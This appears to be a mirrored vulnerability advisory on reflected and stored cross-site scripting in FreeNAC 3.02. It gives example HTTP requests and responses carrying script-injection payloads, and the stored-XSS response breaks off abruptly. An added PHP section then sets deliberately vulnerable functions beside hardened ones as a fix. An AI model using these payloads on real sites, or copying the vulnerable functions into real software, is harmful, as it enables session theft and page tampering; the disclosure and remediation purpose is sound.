FreeNAC v3.02 SQL Injection and XSS Flaws and Fixes - Vulnerability Warning - Black Bar Safety Net (myhack58)

2012-05-24T00:00:00
ID MYHACK58:62201233962
Type myhack58
Reporter Anonymous
Modified 2012-05-24T00:00:00

Description

FreeNAC version 3.02 SQL Injection and XSS Vulnerabilities

Author: Blake

Software address: http://sourceforge.net/project/showfiles.php?group_id=170004

Affected version: 3.02

Test system: Ubuntu 8.04 (FreeNAC 3.02 VMware appliance)

FreeNAC provides virtual LAN assignment, LAN access control (for all kinds of network devices such as servers, workstations, printers and IP phones) and live network end-device discovery. Both 802.1x and Cisco's VMPS port-security modes are supported. VLAN and switch-port management and documentation of patch cabling are also included.

Reflected XSS:

Multiple parameters are vulnerable to reflective cross-site scripting.

Affected Parameters:

comment

mac

graphtype

type

name

Example Request:

GET /stats.php?graphtype=bar&type=vlan13<script>alert(1)</script> HTTP/1.1
Host: 192.168.1.118
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Proxy-Connection: keep-alive
Referer: http://www.xxxx.com/stats.php?graphtype=bar&type=switch
Cookie: freenac=92bcf3d911d94e33106c2e79745e8e8e

Example Response:

HTTP/1.1 200 OK
Date: Sat, 19 May 2012 17:42:41 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Mon, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5676
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>FreeNAC :: Swisscom ::</title>
<link href="bw.css" rel="stylesheet" type="text/css" />
</head>
<a href='./index.html' title='Main Menu'><img src='./images/logo_small.png' border='0' /></a>

[...snip...]

<img src="statgraph.php?stattype=vlan13<script>alert(1)</script>&order=DESC&graphtype=bar"><br>
<br> <p class='UpdateMsg'>Database error</p>
<p>Please go to <a HREF='javascript:javascript:history.go(-1)'>back to the previous screen</a>, or the
<a href='./index.php' >Main Menu</a> and start again, or try again later. </p>

Stored XSS:

The comment parameter is vulnerable to stored cross-site scripting.

Example request (changed from a POST to a GET):

http://www.2xxxx.com/deviceadd.php?name=test&mac=0001.0001.0001&status=1&vlan=6&username=2&office=1&comment="><script>alert(2)</script>&action=Update&action_idx=1

Example Response:

HTTP/1.1 200 OK
Date: Sat, 19 May 2012 17:53:38 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Mon, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6945
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>FreeNAC :: Swisscom ::</title>
<link href="bw.css" rel="stylesheet" type="text/css" />
</head>
<a href='./index.html' title='Main Menu'><img src='./images/logo_small.png' border='0' /></a>
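The fix side of both findings, as an added example that is not FreeNAC's own code. The reflected case puts the `type` value into the `src` attribute of an `<img>` tag (a URL inside an HTML attribute), and the stored case prints the saved `comment` back into the page; the `">` prefix of the advisory's payload suggests a quoted attribute, which is assumed here. Function names, the markup around the values, the allow-lists and the sample inputs are assumptions made for illustration. Each context is shown as the vulnerable pattern beside a hardened replacement that validates input and encodes on output:

```php
<?php
// Added example, not FreeNAC's own code. Function names, surrounding markup,
// allow-lists and sample inputs are assumptions for illustration.

// Context 1 (stats.php): 'type' is reflected into the src attribute of an
// <img> tag, i.e. a URL inside an HTML attribute. Unencoded '<', '"' or '>'
// lets the attacker close the attribute and inject markup.
function vulnerable_graph_img(array $get): string
{
    return '<img src="statgraph.php?stattype=' . $get['type']
         . '&order=DESC&graphtype=' . $get['graphtype'] . '">';
}

function hardened_graph_img(array $get): string
{
    // Validate first: a stat type is an identifier such as 'vlan13' or
    // 'switch' (assumed format). Anything else is rejected, not "cleaned".
    $type = $get['type'] ?? '';
    if (!preg_match('/^[A-Za-z0-9_-]{1,32}$/', $type)) {
        throw new InvalidArgumentException('invalid type parameter');
    }
    // The graph type comes from a fixed set (assumed values).
    $graphtype = $get['graphtype'] ?? 'bar';
    if (!in_array($graphtype, ['bar', 'pie'], true)) {
        throw new InvalidArgumentException('invalid graphtype parameter');
    }
    // Encode for the URL context (percent-encoding via http_build_query),
    // then for the attribute context (entity encoding, which also turns the
    // '&' separators into '&amp;'). Both layers stay in place even though
    // validation already excluded metacharacters: defence in depth.
    $qs = http_build_query([
        'stattype'  => $type,
        'order'     => 'DESC',
        'graphtype' => $graphtype,
    ]);
    return '<img src="statgraph.php?' . htmlspecialchars($qs, ENT_QUOTES, 'ISO-8859-1') . '">';
}

// Context 2 (deviceadd.php): 'comment' is stored and later printed back,
// assumed here to be inside a double-quoted value attribute. Encode at
// output time with ENT_QUOTES so neither quote style can close the
// attribute; the stored value itself stays raw, so every place that prints
// it must encode for its own context.
function vulnerable_comment_input(string $comment): string
{
    return '<input type="text" name="comment" value="' . $comment . '">';
}

function hardened_comment_input(string $comment): string
{
    return '<input type="text" name="comment" value="'
         . htmlspecialchars($comment, ENT_QUOTES, 'ISO-8859-1') . '">';
}

// Constructed inputs mirroring the advisory's two payloads.
$reflected = ['graphtype' => 'bar', 'type' => 'vlan13<script>alert(1)</script>'];
$stored    = '"><script>alert(2)</script>';

echo vulnerable_graph_img($reflected), PHP_EOL;        // script tag lands in the page
try {
    echo hardened_graph_img($reflected), PHP_EOL;
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;      // payload never reaches the page
}
echo hardened_graph_img(['graphtype' => 'bar', 'type' => 'vlan13']), PHP_EOL;

echo vulnerable_comment_input($stored), PHP_EOL;      // value="" is closed, script injected
echo hardened_comment_input($stored), PHP_EOL;        // quotes and angle brackets entity-encoded
```

The charset passed to htmlspecialchars matches the iso-8859-1 declared in the responses above; if the page is later switched to UTF-8, the argument must follow, or PHP may return an empty string for byte sequences it cannot decode. Output encoding alone does not address the SQL injection named in the advisory's title; that needs parameterised queries at the database layer, which is outside what this page shows.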
